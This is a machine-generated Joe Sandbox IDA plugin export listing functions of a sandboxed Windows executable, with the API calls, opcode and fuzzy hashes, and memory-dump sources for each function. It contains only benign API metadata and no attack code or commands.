
Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
Instruction ID: 720aae6f796c395268371445326ddd5f49e266975745dca50c8381c85006ceac
Opcode Fuzzy Hash: bb4731e157eca8a701435b57eacaa52b2d4652227c9e598b24c75b8b98a131a5
Instruction Fuzzy Hash: 28F0F63A60113666EF712A299C04BAF3BDC8FD1B70F14C167E9D4AB1A0DB71D80082A1

Function 0101109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 010110AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 010110B2

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction ID: 21b0b98479194364472a30493d2ee0ad574a45758da9e8ffa8ad674cd6026171
Opcode Fuzzy Hash: 05d9fd3bc10528cc2170b2f293db859956406324a52c58f6d42e6508cd0021ca
Instruction Fuzzy Hash: CDE09232F00145A78F1E86B898159EBB6DDEB4410431442B9F683D7109F9B9D90147A0

Function 01028268 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0102BF30: GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
Part of subcall function 0102BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C
Part of subcall function 0102BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
Part of subcall function 0102BF30: _free.LIBCMT ref: 0102BF95
Part of subcall function 0102BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4

_free.LIBCMT ref: 010282AE
_free.LIBCMT ref: 010282B5

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: fba459acba99376df1d4e1976ead37d57e1a597a0620423939653dd8a5ac4f6c
Instruction ID: 3c97a54aed901fa1a0f23f7f3e2d52c2adf7c9006e2f9c216540f98767613b3e
Opcode Fuzzy Hash: fba459acba99376df1d4e1976ead37d57e1a597a0620423939653dd8a5ac4f6c
Instruction Fuzzy Hash: 55E0222BA06D7351A2B2727E6C00BAF27C44FE2338B558647E9E0CB0D2CE58840A45A2

Function 0100A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction ID: dfecebb3c25db30f3a306a5fe564f37bbcbf9af66a54902cfd2954a1a09ce2ea
Opcode Fuzzy Hash: 3981b8e942d47e1fc791feeb0e2025e391a0b171498ab830953262a961cde0e0
Instruction Fuzzy Hash: DCF0A03220020EBBEF125E60DC80FDA37ACBF04386F448050B984D6194DB72DA94DB10

Function 0100A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641,000000FF), ref: 0100A1F1

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0100977F,?,?,010095CF,?,?,?,?,?,01032641), ref: 0100A21F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction ID: 250eb872ac89ff47c26f0ed0e59c379980176d0260efe9afa50024a3bcd7ff0b
Opcode Fuzzy Hash: ff633822faf26fdfbe114d0dfe6a66dc3e57c84a5a7003419afb3357a4bd90f8
Instruction Fuzzy Hash: 86E09235240219BBEB125E64DC84FDA779CBF083C2F484061B984D6094EB66D984DB50

Function 0101AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,01032641,000000FF), ref: 0101ACB0
CoUninitialize.COMBASE(?,?,?,?,01032641,000000FF), ref: 0101ACB5

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction ID: 0c719d34694ec5a249f6c3af8ed90ed3625840bd0b588d3d89010c0fb862b74a
Opcode Fuzzy Hash: 5d65e081cf25b41e507371366736eb8d8435e2e7a38e9bb9386b41592c260de3
Instruction Fuzzy Hash: DAE06572604650EFC7119B59D845B49FBBCFB88E20F00426AE456D7764CB786800CB90

Function 0100A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A254

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A23A,?,0100755C,?,?,?,?), ref: 0100A280

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction ID: 6c71e386091b5bdf15c179c71d1aff966f09c5afab805abd46f3b72d8e2a1d1d
Opcode Fuzzy Hash: d506ce9ef93d1112ca1ea426ab9bc854445ec6cd9fde8a97fff88fbc75015032
Instruction Fuzzy Hash: C1E092356001289BEB62AB68CC04BD9BB9CAB193E1F0442B1FEC4E71C4DA75DD44CBA0

Function 0101DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0101DEEC

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

SetDlgItemTextW.USER32(00000065,?), ref: 0101DF03

Part of subcall function 0101B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101B579
Part of subcall function 0101B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101B58A
Part of subcall function 0101B568: IsDialogMessageW.USER32(00010442,?), ref: 0101B59E
Part of subcall function 0101B568: TranslateMessage.USER32(?), ref: 0101B5AC
Part of subcall function 0101B568: DispatchMessageW.USER32(?), ref: 0101B5B6

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
Instruction ID: 1f5f3ccfaf945375bf1b625b4b1d4cacb1a305ed9fc8e4cfaa4704c6759713d9
Opcode Fuzzy Hash: 6817d6af9c810c2dc645fae0635eba249954b0896438fb3e609595c05cf60f6d
Instruction Fuzzy Hash: DAE022B640024837EF12ABA0DC05FDE3BAC5B14385F040C92B380EA0E2DA3DEA108760

Function 0101081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction ID: 22e2e2a25e81002e0623cd0a974ceeb2be398cfe2c0ac787b5441860d31de914
Opcode Fuzzy Hash: b8ff588f83bcefe32b2e8a86c8eb4b863252442056528a764ec3133ff3e6958e
Instruction Fuzzy Hash: 52E048765002186BDB11A694DC44FDABBACFF093D1F0400657AC5D2048D678D6C4CBB0

Function 0101A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0101A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0101A3E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction ID: 23d3827fdd94843ec17865931beb3aa99bafda72f3863520f4b14d8d68d07ee4
Opcode Fuzzy Hash: 92cac2a2abdabfba8bf9abd42714168caeda2d99d1355161022609c332502b2c
Instruction Fuzzy Hash: EFE0ED71501219EBDB51DF59C5407DEBBE8FB14260F10C05AA88697204E2B8AA04DBA1

Function 01022B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022BB5

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction ID: e7c785687a0f8a4355ed3da6b01cbf429825379159570fce305615d4bcd914ea
Opcode Fuzzy Hash: 296d687e25b3eac56b7c1eee8460e4bde6a247174686651172ebe20533b67695
Instruction Fuzzy Hash: 99D02234198332185C6B3EFA38065CD338ABD51B79BE003DEE8E08E8C1EE1990409211

Function 010012F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 01001306
ShowWindow.USER32(00000000), ref: 0100130D

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction ID: a782aa06b10ed4b03b03cbbc244e87ccace00316b49aae77fcd4b5e3ab742883
Opcode Fuzzy Hash: 4dea4f6dd8437c3024cf362a5804e837f8c5d63531d52d70e999ee333440ed07
Instruction Fuzzy Hash: 32C0123245C200FECB010BB4DC0AC2BBBB8BBA6312F04C908F0E9C8064C23EC010DB91

Function 01001A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01001A09

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction ID: fe4d38d393a194c0a53231235e5716946bc7e6383fb83103c02cfbfdec819026
Opcode Fuzzy Hash: 4f5d66685e822d19c7e8ababc43881871fb682f0d7bd1bec4fb151bea7444e50
Instruction Fuzzy Hash: F6C1AF30A006559BFF66EF68C494BA97BE5AF05310F0801FAED859F2C6DB31D944CB61

Function 01003BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01003BBF

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fe3ab203d21a6618439430cf3035d832146f3cca81be60487b7a7dc0fbcb93f7
Instruction ID: 56fb610919c4082d76d3dc5e0a3f029569259108a51299a64f476c77603556db
Opcode Fuzzy Hash: fe3ab203d21a6618439430cf3035d832146f3cca81be60487b7a7dc0fbcb93f7
Instruction Fuzzy Hash: 5D71B471540B859EEB27DB74C8549EBB7E9AF24300F40496EE6EB8B2C1DA326584CF11

Function 01008284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01008289

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog$CloseFind
String ID:
API String ID: 2506663941-0
Opcode ID: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction ID: 5f88e9b963bf67398d26c115f1d1c092a74f3649fe068ad1451095828ce5ad8a
Opcode Fuzzy Hash: 6fe45e873539fc8f7c1fe9122511e4b7291e6ff6ba8005cf56c7fcf986602d45
Instruction Fuzzy Hash: C841D671D446599AEB22DB60CC54AEEB7B8BF54304F0484EBE1CA570D2EB755BC4CB10

Function 010013E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction ID: cec93fc24bb8fee3a2c314a4ccbc9c33a426a5b10bb4467c275949e2cd0074e7
Opcode Fuzzy Hash: 69312da0c5e037cafb32245d82483277a16830d08c1d6f3a501f4c7bd1ff7e09
Instruction Fuzzy Hash: 3C4147B0905B419EE725DF398884AEBFBE5BF28300F50492ED5FE87281CB726654CB10

Function 010013DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010013E1

Part of subcall function 01005E37: __EH_prolog.LIBCMT ref: 01005E3C

Part of subcall function 0100CE40: __EH_prolog.LIBCMT ref: 0100CE45

Part of subcall function 0100B505: __EH_prolog.LIBCMT ref: 0100B50A

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction ID: bc2e4b4b238ef7f57742b5714fdac663143d566066f4b237bbba39a9be90b25b
Opcode Fuzzy Hash: 9eb4bcadbec23a800fe2701621e87708881efe2a7862c605bcea76c8e421ee3d
Instruction Fuzzy Hash: C94158B0905B419EE725DF798884AE7FBE5BF28300F50492ED5FE83281CB766654CB10

Function 0101B093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0101B098

Part of subcall function 010013DC: __EH_prolog.LIBCMT ref: 010013E1

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
Instruction ID: 77947289f8eea9fb37141fcc8883db1782b4c376b04e96639b908dc7cd430865
Opcode Fuzzy Hash: 64724e6e4eed0f4cecf13058b192c8dfd7ac8179458c9ca0bda29a17c0f87f96
Instruction Fuzzy Hash: 2A317E71C0024AAFDF15DF68D8509EEBBB4AF19300F50449ED889B7281D739AE04CB61

Function 0102AC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,01033A34), ref: 0102ACF8

